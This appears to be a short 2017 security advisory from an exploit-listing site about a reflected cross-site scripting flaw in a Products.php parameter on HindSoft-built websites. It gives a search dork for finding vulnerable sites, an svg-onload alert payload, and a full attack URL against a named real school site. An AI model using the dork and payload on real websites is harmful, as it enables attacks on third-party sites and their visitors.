HindSoft Technology Cross Site Scripting

2017.11.11
Credit: SonnySpooks
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

HindSoft Technology Cross Site Scripting (XSS) ---------------------------------------------- Twitter: @SonnySpooks ---------------------------------------------- HindSoft - Simplifying e-solutions So Sites Running HindSoft have a paramater on the Products.php file. Products.php?CatName= Dork: intext:"Powered by : HindSoft Technology" ---------------------------------------------- Example: /Products.php?id=1&CatName=School Campus"><svg/onload=alert(/XSS/)> http://www.gdgoenkapatna.com/Products.php?id=1&CatName=School%20Campus%22%3E%3Csvg/onload=alert(/XSS/)%3E


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top